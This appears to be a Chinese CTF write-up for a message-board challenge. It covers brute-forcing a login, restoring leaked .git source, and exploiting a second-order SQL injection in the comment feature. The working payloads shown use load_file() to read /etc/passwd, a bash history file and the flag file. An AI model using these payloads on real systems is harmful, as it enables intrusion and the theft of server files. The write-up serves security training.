主頁面是一個留言板
要想發帖得先登錄
爆破一下密碼,為zhangwei666,登錄即可發帖
掃描到后台有.git文件泄露,但是下載下來的源碼不齊全
<?php include "mysql.php"; session_start(); if($_SESSION['login'] != 'yes'){ header("Location: ./login.php"); die(); } if(isset($_GET['do'])){ switch ($_GET['do']) { case 'write': break; case 'comment': break; default: header("Location: ./index.php"); } } else{ header("Location: ./index.php"); } ?>
F12在控制台處看到提示
看一下git的操作記錄
git log --reflog
commit e5b2a2443c2b6d395d06960123142bc91123148c (refs/stash) Merge: bfbdf21 5556e3a Author: root <root@localhost.localdomain> Date: Sat Aug 11 22:51:17 2018 +0800 WIP on master: bfbdf21 add write_do.php commit 5556e3ad3f21a0cf5938e26985a04ce3aa73faaf Author: root <root@localhost.localdomain> Date: Sat Aug 11 22:51:17 2018 +0800 index on master: bfbdf21 add write_do.php commit bfbdf218902476c5c6164beedd8d2fcf593ea23b (HEAD -> master) Author: root <root@localhost.localdomain> Date: Sat Aug 11 22:47:29 2018 +0800 add write_do.php
恢復一下
git reset --hard e5b2a2443c2b6d395d06960123142bc91123148c
得到完整源碼
<?php include "mysql.php"; session_start(); if($_SESSION['login'] != 'yes'){ header("Location: ./login.php"); die(); } if(isset($_GET['do'])){ switch ($_GET['do']) { case 'write': $category = addslashes($_POST['category']); $title = addslashes($_POST['title']); $content = addslashes($_POST['content']); $sql = "insert into board set category = '$category', title = '$title', content = '$content'"; $result = mysql_query($sql); header("Location: ./index.php"); break; case 'comment': $bo_id = addslashes($_POST['bo_id']); $sql = "select category from board where id='$bo_id'"; $result = mysql_query($sql); $num = mysql_num_rows($result); if($num>0){ $category = mysql_fetch_array($result)['category']; $content = addslashes($_POST['content']); $sql = "insert into comment set category = '$category', content = '$content', bo_id = '$bo_id'"; $result = mysql_query($sql); } header("Location: ./comment.php?id=$bo_id"); break; default: header("Location: ./index.php"); } } else{ header("Location: ./index.php"); } ?>
在write部分使用addslashes()函數進行了過濾
$category = addslashes($_POST['category']); $title = addslashes($_POST['title']); $content = addslashes($_POST['content']);
但是在comment部分對從數據庫中取出的category沒有過濾,這就造成了二次注入
$category = mysql_fetch_array($result)['category']; $content = addslashes($_POST['content']);
這里的二次注入表現為,addslashes過濾后產生的\不會進入數據庫,即'1過濾后變成\'1,進入庫中卻仍為'1,我們在取出數據后進行二次拼接,即可造成注入
在發帖處構造category為
', content=user(),/*
在留言處輸入的content為
*/#
最后的表現形式為
$sql = "insert into comment set category = '', content=user(),/* content = '*/#', bo_id = '$bo_id'";
相當於我們構造了新的content,原來的content被我們用多行注釋符/**/注釋掉了
看到用戶為root,如此高的權限,可以嘗試使用load_file()讀取文件
', content=load_file('/etc/passwd'),/*
讀取一下歷史操作
', content=load_file('/home/www/.bash_history'),/*
注意到雖然/var/www/html目錄下的.DS_Store文件被刪除了,但是/tmp/html目錄下的.DS_Store文件還在,讀一下
', content=hex(load_file('/tmp/html/.DS_Store')),/*
獲取到的十六進制數據使用winhex打開,看到有flag_8946e1ff1ee3e40f.php,讀一下。注意flag在頁面源代碼中,按F12查看
', content=load_file('/tmp/html/flag_8946e1ff1ee3e40f.php'),/*
flag{f9ca1a6b-9d78-11e8-90a3-c4b301b7b99b}
假的flag,換一個目錄讀/var/www/html/
', content=(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php')),/*
獲取到真實的flag
flag{0f843a71-795a-4235-9280-4c9acfbfc6b2}
參考